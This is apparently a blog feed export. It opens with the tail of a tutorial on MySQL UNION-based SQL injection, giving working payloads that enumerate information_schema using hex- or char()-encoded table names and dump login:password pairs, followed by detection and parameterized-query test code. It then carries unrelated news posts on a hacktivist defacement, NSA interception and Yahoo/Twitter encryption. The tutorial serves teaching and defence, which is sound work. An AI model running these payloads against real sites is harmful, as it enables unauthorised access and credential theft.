MySQL server version for the right syntax to use near '<span style="color: mediumpurple;">_Rafa_</span>'
at line 1 <br />
<br />
=--------------------------= <o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-family: inherit;"><span lang="PT-BR" style="color: #36648b;">http://[site]/query.php?string= </span><span lang="PT-BR" style="color: #8b3a3a;">1 </span><span lang="PT-BR" style="color: #fdb910;">union all select </span><span lang="PT-BR" style="color: #551a8b;">1,2,3,4,</span><span lang="PT-BR" style="color: mediumpurple;">passwd </span><span lang="PT-BR" style="color: #fdb910;">from</span><span lang="PT-BR"> <span style="color: firebrick;">usuarios</span><span style="color: #551a8b;">--</span> <o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-family: inherit;"><span lang="PT-BR" style="color: mediumpurple;">rafael1337</span><span lang="PT-BR"> <br />
or<br />
Unknown column '<span style="color: mediumpurple;">rafael1337</span>' in 'field
list' <br />
or <br />
You have an error in your SQL syntax; check the manual that corresponds to your
MySQL server version for the right syntax to use near '<span style="color: mediumpurple;">rafael1337</span>'
at line 1 <br />
<br />
=--------------------------=--------------------------=--------------------------=--------------------------=
<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<b><span lang="PT-BR"><span style="font-family: inherit;">Dump<o:p></o:p></span></span></b></div>
<div class="MsoNoSpacing">
<span style="font-family: inherit;"><b><span lang="PT-BR">This
works in versions 5.x.y and up <span style="color: dimgrey;">[ 1º Method ]</span></span></b><span lang="PT-BR"> <br />
<br />
"<span style="color: firebrick;">usuarios</span>" hexadecimal ->
"<span style="color: #8b4500;">7573756172696f73</span>" <br />
<br />
<span style="color: #36648b;">http://[site]/query.php?string= </span><span style="color: #8b3a3a;">1 </span><span style="color: #fdb910;">union all select </span><span style="color: #551a8b;">1,2,3,4,</span><span style="color: mediumpurple;">group_concat(column_name)
</span><span style="color: #fdb910;">from</span> <span style="color: deeppink;">information_schema.columns
</span><span style="color: #fdb910;">where</span> <span style="color: deeppink;">table_name=</span><span style="color: #8b4500;">0x7573756172696f73</span><span style="color: #551a8b;">--</span>
<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-family: inherit;"><span lang="PT-BR" style="color: mediumpurple;">login,passwd,id,texto</span><span lang="PT-BR"> <br />
or <br />
Unknown column '<span style="color: mediumpurple;">login,passwd,id,texto</span>'
in 'where clause' <br />
or <br />
You have an error in your SQL syntax; check the manual that corresponds to your
MySQL server version for the right syntax to use near '<span style="color: mediumpurple;">login,passwd,id,texto</span>'
at line 1 <br />
<br />
<>------------------------<>-------------------------<>--------------------------<>
<br />
<br />
<b><span style="color: dimgrey;">[ 2º Method ]</span></b> <br />
<br />
"<span style="color: firebrick;">usuarios</span>" decimal -> "<span style="color: #8b4500;">117,115,117,97,114,105,111,115</span>" <br />
<br />
<span style="color: #36648b;">http://[site]/query.php?string= </span><span style="color: #8b3a3a;">1 </span><span style="color: #fdb910;">union all select </span><span style="color: #551a8b;">1,2,3,4,</span><span style="color: mediumpurple;">concat(column_name)
</span><span style="color: #fdb910;">from</span> <span style="color: deeppink;">information_schema.columns
</span><span style="color: #fdb910;">where</span> <span style="color: deeppink;">table_name=char(</span><span style="color: #8b4500;">117,115,117,97,114,105,111,115</span><span style="color: deeppink;">)</span><span style="color: #fdb910;"> limit</span> <span style="color: deeppink;">0,1</span><span style="color: #551a8b;">--</span> <o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-family: inherit;"><span lang="PT-BR" style="color: mediumpurple;">login</span><span lang="PT-BR"> <br />
or<br />
Unknown column '<span style="color: mediumpurple;">login</span>' in 'where
clause' <br />
or <br />
You have an error in your SQL syntax; check the manual that corresponds to your
MySQL server version for the right syntax to use near '<span style="color: mediumpurple;">login</span>'
at line 1 <br />
<br />
=--------------------------= <o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-family: inherit;"><span lang="PT-BR" style="color: #36648b;">http://[site]/query.php?string= </span><span lang="PT-BR" style="color: #8b3a3a;">1 </span><span lang="PT-BR" style="color: #fdb910;">union all select </span><span lang="PT-BR" style="color: #551a8b;">1,2,3,4,</span><span lang="PT-BR" style="color: mediumpurple;">concat(column_name)
</span><span lang="PT-BR" style="color: #fdb910;">from</span><span lang="PT-BR"> <span style="color: deeppink;">information_schema.columns
</span><span style="color: #fdb910;">where</span> <span style="color: deeppink;">table_name=char(</span><span style="color: #8b4500;">117,115,117,97,114,105,111,115</span><span style="color: deeppink;">)</span><span style="color: #fdb910;"> limit</span> <span style="color: deeppink;">1,2</span><span style="color: #551a8b;">--</span> <o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-family: inherit;"><span lang="PT-BR" style="color: mediumpurple;">passwd</span><span lang="PT-BR"> <br />
or<br />
Unknown column '<span style="color: mediumpurple;">passwd</span>' in 'where
clause' <br />
or <br />
You have an error in your SQL syntax; check the manual that corresponds to your
MySQL server version for the right syntax to use near '<span style="color: mediumpurple;">passwd</span>'
at line 1 <br />
<br />
=--------------------------= <o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-family: inherit;"><span lang="PT-BR" style="color: #36648b;">http://[site]/query.php?string= </span><span lang="PT-BR" style="color: #8b3a3a;">1 </span><span lang="PT-BR" style="color: #fdb910;">union all select </span><span lang="PT-BR" style="color: #551a8b;">1,2,3,4,</span><span lang="PT-BR" style="color: mediumpurple;">concat(column_name)
</span><span lang="PT-BR" style="color: #fdb910;">from</span><span lang="PT-BR"> <span style="color: deeppink;">information_schema.columns
</span><span style="color: #fdb910;">where</span> <span style="color: deeppink;">table_name=char(</span><span style="color: #8b4500;">117,115,117,97,114,105,111,115</span><span style="color: deeppink;">)</span><span style="color: #fdb910;"> limit</span> <span style="color: deeppink;">2,3</span><span style="color: #551a8b;">--</span> <o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-family: inherit;"><span lang="PT-BR" style="color: mediumpurple;">id</span><span lang="PT-BR"> <br />
or <br />
Unknown column '<span style="color: mediumpurple;">id</span>' in 'where clause' <br />
or <br />
You have an error in your SQL syntax; check the manual that corresponds to your
MySQL server version for the right syntax to use near '<span style="color: mediumpurple;">id</span>'
at line 1 <br />
<br />
=--------------------------= <o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-family: inherit;"><span lang="PT-BR" style="color: #36648b;">http://[site]/query.php?string= </span><span lang="PT-BR" style="color: #8b3a3a;">1 </span><span lang="PT-BR" style="color: #fdb910;">union all select </span><span lang="PT-BR" style="color: #551a8b;">1,2,3,4,</span><span lang="PT-BR" style="color: mediumpurple;">concat(column_name)
</span><span lang="PT-BR" style="color: #fdb910;">from</span><span lang="PT-BR"> <span style="color: deeppink;">information_schema.columns
</span><span style="color: #fdb910;">where</span> <span style="color: deeppink;">table_name=char(</span><span style="color: #8b4500;">117,115,117,97,114,105,111,115</span><span style="color: deeppink;">)</span><span style="color: #fdb910;"> limit</span> <span style="color: deeppink;">3,4</span><span style="color: #551a8b;">--</span> <o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-family: inherit;"><span lang="PT-BR" style="color: mediumpurple;">texto</span><span lang="PT-BR"> <br />
or <br />
Unknown column '<span style="color: mediumpurple;">texto</span>' in 'where clause'
<br />
or <br />
You have an error in your SQL syntax; check the manual that corresponds to your
MySQL server version for the right syntax to use near '<span style="color: mediumpurple;">texto</span>'
at line 1 <o:p></o:p></span></span></div>
<div align="center" class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: center;">
<b><span lang="PT-BR"><span style="font-family: inherit;">----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------<o:p></o:p></span></span></b></div>
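<div class="MsoNormal">
For defenders: the two "Dump" methods above hide the table name as a hex literal or a char() list, so a log search for the plain word "usuarios" misses them. The following is an added example, not part of the original article; the rule names, the watched-table list and the sample request lines are constructed for illustration. It normalizes both encodings before matching.</div>

```python
import re
from urllib.parse import urlsplit, parse_qsl

# MySQL string literals written as hex (0x7573...) or as char(117,115,...).
HEX_LITERAL = re.compile(r"\b0x((?:[0-9a-f]{2})+)", re.I)
CHAR_CALL = re.compile(r"\bchar\(\s*(\d{1,3}(?:\s*,\s*\d{1,3})*)\s*\)", re.I)

# Hypothetical rule set, applied to the normalized parameter value.
RULES = [
    ("union-select", re.compile(r"\bunion\b(?: all)? select\b")),
    ("schema-enumeration", re.compile(r"\binformation_schema\.(?:columns|tables)\b")),
    ("trailing-comment", re.compile(r"--\s*$")),  # weak signal on its own
]


def _decode_hex(match):
    return "'" + bytes.fromhex(match.group(1)).decode("latin-1") + "'"


def _decode_char(match):
    codes = [int(c) for c in match.group(1).split(",")]
    if any(c > 255 for c in codes):
        return match.group(0)  # not a single-byte string, leave untouched
    return "'" + "".join(chr(c) for c in codes) + "'"


def normalize(value):
    """Expand hex / char() literals, collapse whitespace, lower-case."""
    value = HEX_LITERAL.sub(_decode_hex, value)
    value = CHAR_CALL.sub(_decode_char, value)
    return re.sub(r"\s+", " ", value).strip().lower()


def inspect(request_target, watched_tables=("usuarios",)):
    """Return [(parameter, [rule labels])] for one request path + query string."""
    findings = []
    query = urlsplit(request_target).query
    for name, raw in parse_qsl(query, keep_blank_values=True):
        norm = normalize(raw)
        hits = [label for label, rx in RULES if rx.search(norm)]
        for table in watched_tables:
            # The name only appears after decoding: it was deliberately encoded.
            if table in norm and table not in raw.lower():
                hits.append("encoded-identifier:" + table)
        if hits:
            findings.append((name, hits))
    return findings


# Constructed request lines modelled on the URLs shown in the article.
SAMPLE_REQUESTS = [
    "/query.php?string=1",
    "/query.php?string=1%20union%20all%20select%201,2,3,4,group_concat(column_name)"
    "%20from%20information_schema.columns%20where%20table_name=0x7573756172696f73--",
    "/query.php?string=1%20union%20all%20select%201,2,3,4,concat(column_name)"
    "%20from%20information_schema.columns%20where%20"
    "table_name=char(117,115,117,97,114,105,111,115)%20limit%200,1--",
    "/query.php?string=1%20union%20all%20select%201,2,3,4,login%20from%20usuarios--",
    "/search.php?q=trade+union+history",
]

if __name__ == "__main__":
    for target in SAMPLE_REQUESTS:
        print(inspect(target) or "clean", "<-", target[:60])
```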
<div class="MsoNormal">
<b><span lang="PT-BR"><span style="font-family: inherit;">Extracting
data from the columns of a given table<o:p></o:p></span></span></b></div>
<div class="MsoNormal">
<span style="font-family: inherit;"><span lang="PT-BR" style="color: #36648b;">http://[site]/query.php?string= </span><span lang="PT-BR" style="color: #8b3a3a;">1 </span><span lang="PT-BR" style="color: #fdb910;">union all select </span><span lang="PT-BR" style="color: #551a8b;">1,2,3,4,</span><span lang="PT-BR" style="color: mediumpurple;">concat(login,0x20,0x3a,0x20,senha)</span><span lang="PT-BR"> <span style="color: #fdb910;">from</span>
<span style="color: firebrick;">usuarios</span><span style="color: #551a8b;">--</span>
<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-family: inherit;"><span lang="PT-BR" style="color: mediumpurple;">_Rafa_ : fontes1337</span><span lang="PT-BR"> <br />
or <br />
Unknown column '<span style="color: mediumpurple;">_Rafa_ : fontes1337</span>' in
'field list' <br />
or <br />
You have an error in your SQL syntax; check the manual that corresponds to your
MySQL server version for the right syntax to use near '<span style="color: mediumpurple;">_Rafa_
: fontes1337</span>' at line 1 <br />
<br />
=--------------------------= <o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-family: inherit;"><span lang="PT-BR" style="color: #36648b;">http://[site]/query.php?string= </span><span lang="PT-BR" style="color: #8b3a3a;">1 </span><span lang="PT-BR" style="color: #fdb910;">union all select </span><span lang="PT-BR" style="color: #551a8b;">1,2,3,4,</span><span lang="PT-BR" style="color: mediumpurple;">group_concat(login,0x20,0x3a,0x20,senha)</span><span lang="PT-BR"> <span style="color: #fdb910;">from</span>
<span style="color: firebrick;">usuarios</span><span style="color: #551a8b;">--</span>
<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-family: inherit;"><span lang="PT-BR" style="color: mediumpurple;">_Rafa_ : fontes1337,l337_ : 3_l33t,greyhats : fontes,hackers :
mitnick,green : rha_infosec</span><span lang="PT-BR"> <br />
or <br />
Unknown column '<span style="color: mediumpurple;">_Rafa_ : fontes1337,l337_ :
3_l33t,greyhats : fontes,hackers : mitnick,green : rha_infosec</span>' in
'field list' <br />
or <br />
You have an error in your SQL syntax; check the manual that corresponds to your
MySQL server version for the right syntax to use near '<span style="color: mediumpurple;">_Rafa_
: fontes1337,l337_ : 3_l33t,greyhats : fontes,hackers : mitnick,green :
rha_infosec</span>' at line 1 <br />
<br />
=--------------------------= <o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-family: inherit;"><span lang="PT-BR" style="color: #36648b;">http://[site]/query.php?string= </span><span lang="PT-BR" style="color: #8b3a3a;">1 </span><span lang="PT-BR" style="color: #fdb910;">union all select </span><span lang="PT-BR" style="color: #551a8b;">1,2,3,4,</span><span lang="PT-BR" style="color: mediumpurple;">concat_ws(0x20,0x3a,0x20,login,senha)</span><span lang="PT-BR"> <span style="color: #fdb910;">from</span>
<span style="color: firebrick;">usuarios</span><span style="color: #551a8b;">--</span>
<o:p></o:p></span></span></div>
<div class="MsoNormal" style="margin-bottom: 12pt;">
<span style="font-family: inherit;"><span lang="PT-BR" style="color: mediumpurple;">_RHA_ : infosec1337</span><span lang="PT-BR"> <br />
or <br />
Unknown column '<span style="color: mediumpurple;">_RHA_ : infosec1337</span>' in
'field list' <br />
or <br />
You have an error in your SQL syntax; check the manual that corresponds to your
MySQL server version for the right syntax to use near '<span style="color: mediumpurple;">_Mlk_
: gremio1903</span>' at line 1 <br />
<!--[if !supportLineBreakNewLine]--><br />
<!--[endif]--><o:p></o:p></span></span></div>
<div class="MsoNormal" style="margin-bottom: 12pt;">
<span lang="PT-BR"><span style="font-family: inherit;">=--------------------------=<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span style="font-family: inherit;"><b><span lang="PT-BR">Concat</span></b><span lang="PT-BR"> <br />
group_concat() <span style="color: dimgrey;">=></span> returns everything you ask for, across all rows, joined with ASCII characters</span></span></div>
<div class="MsoNoSpacing">
<span lang="PT-BR"><span style="font-family: inherit;">concat() <span style="color: dimgrey;">=></span> returns what you ask for, one row at a time, joined with ASCII characters</span></span></div>
<div class="MsoNoSpacing">
<span lang="PT-BR"><span style="font-family: inherit;">concat_ws()
<span style="color: dimgrey;">=></span> joins values with a separator<br />
<br />
<b>Hexadecimal</b> <br />
0x3a <span style="color: dimgrey;">=></span> : <br />
0x20 <span style="color: dimgrey;">=></span> space<br />
0x2d <span style="color: dimgrey;">=></span> - <br />
0x2b <span style="color: dimgrey;">=></span> + <o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<br /></div>
<div class="MsoNoSpacing" style="text-align: justify;">
<span lang="PT-BR"><span style="font-family: inherit;">Readers,
this article is for educational purposes only. I could continue explaining how to
exploit web sites, but that is not my intention.</span></span></div>
<div class="MsoNoSpacing" style="text-align: justify;">
<span lang="PT-BR"><span style="font-family: inherit;">It is
known that the impact of the change may provide unauthorized access to a
restricted area while being imperceptible to the eye of an inexperienced developer;
it may also allow the deletion of a table, compromising the entire application,
among other effects. So I want to emphasize that this paper is for security researchers and developers, so that they beware and test their code.</span></span></div>
<div class="MsoNoSpacing" style="text-align: justify;">
<span lang="PT-BR"><span style="font-family: inherit;"><br /></span></span></div>
<div class="MsoNoSpacing" style="text-align: justify;">
<b><span lang="PT-BR" style="font-size: 14pt;"><span style="font-family: inherit;"><u>CONCLUSION</u><o:p></o:p></span></span></b></div>
<div class="MsoNoSpacing" style="text-align: justify;">
<span style="font-family: inherit;">Many
companies keep important information on their websites and in their databases.
Information is the most valuable intangible asset; the question is how
developers are dealing with this huge responsibility.</span></div>
<div class="MsoNoSpacing" style="text-align: justify;">
<span lang="PT-BR"><span style="font-family: inherit;">The
challenge is to develop increasingly innovative sites, coupled with mechanisms
that will provide security to users.<o:p></o:p></span></span></div>
<div class="MsoNoSpacing" style="text-align: justify;">
<span lang="PT-BR"><span style="font-family: inherit;">
</span></span></div>
<div class="MsoNoSpacing" style="text-align: justify;">
<span lang="PT-BR"><span style="font-family: inherit;">The
purpose of this paper is to present what SQL Injection is, how applications are
exploited, and techniques for testing, allowing the developer to build a
more robust system and understand the vulnerability.</span></span></div>
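<div class="MsoNoSpacing" style="text-align: justify;">
To make "test your code" concrete, the following added example (not from the original article) puts a string-concatenated lookup next to a validated, parameterized one and replays two of the article's UNION strings as a regression check. It assumes Python's sqlite3 in place of PHP/MySQL, a hypothetical five-column noticias table behind query.php, and constructed rows.</div>

```python
import re
import sqlite3

# Two of the strings shown in the article, reused here as regression inputs.
PAGE_PAYLOADS = [
    "1 union all select 1,2,3,4,login from usuarios--",
    "1 union all select 1,2,3,4,passwd from usuarios--",
]


def make_db():
    """In-memory stand-in for the site's database (constructed data)."""
    db = sqlite3.connect(":memory:")
    db.executescript(
        """
        CREATE TABLE noticias (id INTEGER, titulo TEXT, autor TEXT, data TEXT, texto TEXT);
        CREATE TABLE usuarios (id INTEGER, login TEXT, passwd TEXT, texto TEXT);
        INSERT INTO noticias VALUES (1, 'Title', 'author', '2014-01-01', 'Body');
        INSERT INTO usuarios VALUES (1, 'alice', 'constructed-secret', '');
        """
    )
    return db


def lookup_vulnerable(db, string):
    """The flaw: the request parameter becomes part of the SQL text."""
    sql = "SELECT id, titulo, autor, data, texto FROM noticias WHERE id = " + string
    return db.execute(sql).fetchall()


def lookup_hardened(db, string):
    """Validate the type first, then bind the value instead of concatenating it."""
    if not re.fullmatch(r"[0-9]{1,9}", string):
        raise ValueError("id must be a short decimal number")
    sql = "SELECT id, titulo, autor, data, texto FROM noticias WHERE id = ?"
    return db.execute(sql, (int(string),)).fetchall()


def leaked_by(lookup, db):
    """Return the payloads for which `lookup` exposed a value stored in usuarios."""
    secrets = {v for row in db.execute("SELECT login, passwd FROM usuarios") for v in row}
    leaked = []
    for payload in PAGE_PAYLOADS:
        try:
            rows = lookup(db, payload)
        except ValueError:
            continue  # rejected before reaching the database
        if any(cell in secrets for row in rows for cell in row):
            leaked.append(payload)
    return leaked


if __name__ == "__main__":
    db = make_db()
    print("vulnerable leaks:", leaked_by(lookup_vulnerable, db))
    print("hardened leaks:  ", leaked_by(lookup_hardened, db))
```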
<div class="MsoNoSpacing" style="text-align: center;">
<span lang="PT-BR"><span style="font-family: inherit;">**********</span></span></div>
<div class="MsoNoSpacing" style="text-align: justify;">
<span lang="PT-BR"><span style="font-family: inherit;">I hope you all will enjoy the above article, as I did. On behalf of the entire <b><a href="http://www.voiceofgreyhat.com/">VOGH Team</a></b>, I sincerely thank Mr. Rafael Souza for his remarkable contribution. </span></span></div>
<div class="MsoNoSpacing" style="text-align: justify;">
<span lang="PT-BR"><span style="font-family: inherit;">For more such exclusive research papers, along with all kinds of breaking cyber updates from across the globe, stay tuned to <b><a href="http://www.voiceofgreyhat.com/">VOGH</a></b>. </span></span></div>
<div class="MsoNoSpacing" style="text-align: justify;">
<span lang="PT-BR"><span style="font-family: inherit;"><br /></span></span></div>
<div class="MsoNoSpacing" style="text-align: justify;">
<br /></div>
</div>
</div>
</div>
</div>
Avik Sarkarhttp://www.blogger.com/profile/15506950346762737730noreply@blogger.comtag:blogger.com,1999:blog-3968483416361429386.post-70812867951518766942013-11-30T15:12:00.001+05:302013-11-30T15:12:30.204+05:30Indian Hacker 'Godzilla' Hacked & Defaced Two Websites of Lashkar-e-Taiba<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: center;">
<span style="font-size: large;"><b><span style="color: red;">Lashkar-e-Taiba</span></b> Official Website <b>Hacked</b> & <b>Defaced</b> By Indian Hacker <b style="text-align: justify;">Godzilla</b><span style="text-align: justify;"> </span>(</span><span style="font-size: large;">Payback of <b><span style="color: red;">26/11</span></b>)</span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzGyu_Hxmo6Sc4Gpxz9fNzudst2jyDftlPBeXXwUA7hzzRodJYg3HI2oSWp22r8AZ1JKPQeoGLgbxcC38CiXwn0AenoueeOA3G3DgHrfsFZ8croNFz-HexIXtOmqi2_RxWtx5TsG69PhI/s1600/lashkar-e-taiba-official-website-hacked.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="356" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzGyu_Hxmo6Sc4Gpxz9fNzudst2jyDftlPBeXXwUA7hzzRodJYg3HI2oSWp22r8AZ1JKPQeoGLgbxcC38CiXwn0AenoueeOA3G3DgHrfsFZ8croNFz-HexIXtOmqi2_RxWtx5TsG69PhI/s400/lashkar-e-taiba-official-website-hacked.png" width="400" /></a></div>
<div style="text-align: justify;">
A young <a href="http://www.voiceofgreyhat.com/search/label/indian">Indian hacker</a> going by the name of <b>Godzilla</b> has targeted a couple of websites of the infamous militant group <b><span style="color: red;">Lashkar-e-Taiba (LT)</span></b>, which is widely known as one of the largest and most active pure jihadi organizations in South Asia, operating mainly from <a href="http://www.voiceofgreyhat.com/search?q=Pakistan">Pakistan</a>. As per sources, the hacker managed to gain access to the servers hosting both <b><a href="http://jamatdawa.org/">jamatdawa.org</a></b> & <b><a href="http://jamatdawa.net/">jamatdawa.net</a></b>; during this round of <a href="http://www.voiceofgreyhat.com/search?q=cyber+attack">cyber attack</a> he not only attacked the LT server but also changed the index page of the above-mentioned sites. The hacker left his message on the index page saying <i>"Hafiz Muhammad Saeed, its a promise from our side you will not stay in Pakistan for a longer time."</i> For those who are unaware of Hafiz Muhammad, Hafiz is the founder and one of the masterminds of Lashkar-e-Taiba; he was behind, most notably, the 2001 Indian Parliament attack and the 2008 Mumbai attacks. This hack by Godzilla was directly linked to the Mumbai attack of 26/11; in the defaced index page the hacker quoted<i><span style="color: red;"><b> "26/11 we will never forget." </b></span></i>The <a href="http://www.voiceofgreyhat.com/search/label/defacement">defacement </a>was also carried out on 26th November itself, as payback for Lashkar's brutal attack on Mumbai, which killed 170 innocent civilians. At the time of writing, both of the above Lashkar websites are still under construction, but you can find the deface mirror at <a href="http://zone-hc.com/archive/mirror/45a0f4a_jamatdawa.org_mirror_.html">Zone-hc.com</a>. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<br /></div>
</div>
Avik Sarkarhttp://www.blogger.com/profile/15506950346762737730noreply@blogger.comtag:blogger.com,1999:blog-3968483416361429386.post-37196387040419544952013-11-30T03:33:00.001+05:302013-11-30T03:33:33.485+05:30Twitter & Yahoo Tightening Their Security to Prevent Eavesdropping of NSA<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: justify;">
<div style="text-align: center;">
<span style="font-size: large;"><b><span style="color: #0b5394;">Twitter </span></b>& <b><span style="color: #674ea7;">Yahoo </span>Tightening </b>Their Security to Prevent <b><span style="color: red;">Eavesdropping </span></b>of <b><span style="color: red;">NSA </span></b>& Other Govt Agencies </span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0EOuJMSHqQGdUYvs6efDdHgOGpYwyTZorO_ObxDKpbZYcGW3d5MzZLEzDg6GbA3Bmwsp_zHjTcxwo9YDrq5I6oR9U_LKUchYVHA6cBXSu1PXU5s_M1R5pKYLlE0MYyEbdCuwNNAFwz68/s1600/twitter-yahoo-tightening-security-2stop-eavesdropping.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="265" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0EOuJMSHqQGdUYvs6efDdHgOGpYwyTZorO_ObxDKpbZYcGW3d5MzZLEzDg6GbA3Bmwsp_zHjTcxwo9YDrq5I6oR9U_LKUchYVHA6cBXSu1PXU5s_M1R5pKYLlE0MYyEbdCuwNNAFwz68/s400/twitter-yahoo-tightening-security-2stop-eavesdropping.jpg" width="400" /></a></div>
Last month an untold and sensational story <a href="http://www.washingtonpost.com/world/national-security/nsa-infiltrates-links-to-yahoo-google-data-centers-worldwide-snowden-documents-say/2013/10/30/e51d661e-4166-11e3-8b74-d89d714ca4dd_story.html">came to light</a>, when the whistleblower <b><a href="http://www.voiceofgreyhat.com/search?q=Edward+Snowden">Edward Snowden </a></b>unveiled one of the top secret programs of the <b><a href="http://www.voiceofgreyhat.com/search?q=NSA">NSA</a> </b>called <b><span style="color: red;">“Muscular”</span></b>. Former NSA contractor <a href="http://www.voiceofgreyhat.com/search?q=Edward+Snowden">Snowden </a>himself disclosed that the National Security Agency has secretly <a href="http://www.voiceofgreyhat.com/search?q=breach">broken into</a> the main communications links that connect <b><a href="http://www.voiceofgreyhat.com/search?q=Yahoo">Yahoo</a></b> and <b><a href="http://www.voiceofgreyhat.com/search?q=Google">Google</a></b> data centers around the world in order to collect and snoop on the private data of millions of internet users. The NSA’s acquisitions directorate sends millions of records every day from internal Yahoo and Google networks to data warehouses at the agency’s headquarters at Fort Meade, Md. In the preceding 30 days, the report said, field collectors had processed and sent back <b>181,280,466</b> new records including “metadata,” which would indicate who sent or received e-mails and when, as well as content such as text, audio and video. Both Yahoo & Google said that they had never given any government agency access to their data centers. 
A Yahoo spokeswoman said, <i>“We have strict controls in place to protect the security of our data centers, and we have not given access to our data centers to the NSA or to any other government agency.”</i> Google’s chief legal officer, David Drummond, said, <i>“We are outraged at the lengths to which the government seems to have gone to intercept data from our private fiber networks, and it underscores the need for urgent reform,” </i><br />
<i><br /></i>
The fact of the matter, however, is that the NSA has indeed sniffed the personal & private communications of millions of internet users of tech giants like Yahoo and Google. To prevent this kind of privacy breach, the tech giants that hold the personal records and credentials of the masses are now tightening and enhancing their existing security systems. According to <b>Marissa Mayer</b>, CEO of Yahoo, <i>"We’ve worked hard over the years to earn our users’ trust and we fight hard to preserve it."</i> Yahoo also says it will encrypt all information moving between its data centers by the end of the first quarter, and it will work on getting international partners to enable HTTPS <a href="http://www.voiceofgreyhat.com/search?q=encryption">encryption</a> in Yahoo-branded Mail services. Yahoo says it will give users an option to encrypt all data flow to and from Yahoo. <i>"Yahoo has never given access to our data centers to the NSA or to any other government agency ever. There is nothing more important to us than protecting our users’ privacy. To that end, we recently announced that we will make Yahoo Mail even more secure by introducing https (SSL - Secure Sockets Layer) encryption with a 2048-bit key across our network by January 8, 2014."</i> added <a href="http://yahoo.tumblr.com/post/67373852814/our-commitment-to-protecting-your-information">Marissa Mayer</a>.<br />
<br /></div>
<div style="text-align: justify;">
Not only Yahoo but also the <a href="http://www.voiceofgreyhat.com/search?q=social+network">social networking</a> giant <a href="http://www.voiceofgreyhat.com/search?q=twitter">Twitter</a>, which has almost 550 million registered users and 250 million active users across the globe, took immediate steps after this breathtaking story of NSA spying came into the spotlight. Twitter is implementing new <a href="http://www.voiceofgreyhat.com/search?q=security">security measures</a> that should make it much more difficult for anyone to eavesdrop on communications between its servers and users. The entire set of measures is intended to tighten the data privacy of its users. According to a Twitter blog post, the company has implemented<b> "perfect forward secrecy"</b> on its Web and mobile platforms, which <b>made eavesdropping almost impossible</b>. "As part of our continuing effort to keep our users’ information as secure as possible, we’re happy to announce that we recently enabled forward secrecy for traffic on twitter.com, api.twitter.com, and mobile.twitter.com. On top of the usual confidentiality and integrity properties of HTTPS, forward secrecy adds a new property. If an adversary is currently recording all Twitter users’ encrypted traffic, and they later crack or steal Twitter’s private keys, they should not be able to use those keys to decrypt the recorded traffic." -said the <a href="https://blog.twitter.com/2013/forward-secrecy-at-twitter-0">blog post</a>.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
While talking about the NSA's Muscular program, we would also like to remind you that a couple of weeks ago we came to know about <a href="http://www.voiceofgreyhat.com/2013/11/snowden-unveiled-royal-concierge-GCHQ.html">'Royal Concierge'</a>, another secret program of <a href="http://www.voiceofgreyhat.com/search?q=GCHQ">GCHQ</a> & <a href="http://www.voiceofgreyhat.com/search?q=GCHQ">NSA</a>, uncovered by Edward Snowden, to spy on foreign diplomats through hotel bookings.<br />
<br />
<div style="text-align: right;">
<span style="font-size: xx-small;">-Source (<a href="http://www.cio.com/article/743653/Twitter_Tightens_Security_Against_NSA_Snooping?taxonomyId=1375">CIO</a> & <a href="http://www.pcworld.com/article/2064507/in-the-wake-of-nsa-spying-yahoo-promises-encryption-everywhere.html">PC World</a>)</span> </div>
<div style="text-align: right;">
<br /></div>
<div style="text-align: right;">
<br /></div>
</div>
</div>
Avik Sarkarhttp://www.blogger.com/profile/15506950346762737730noreply@blogger.comtag:blogger.com,1999:blog-3968483416361429386.post-20584314742870166512013-11-30T03:32:00.000+05:302013-11-30T03:32:04.582+05:30Red Hat Inc Announced The General Availability Red Hat Enterprise Linux (RHEL) 6.5 <div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: center;">
<span style="font-size: large;"><b>Red Hat Inc</b> Announced The General Availability <b><span style="color: red;">Red Hat Enterprise Linux (RHEL) 6.5 </span></b></span></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
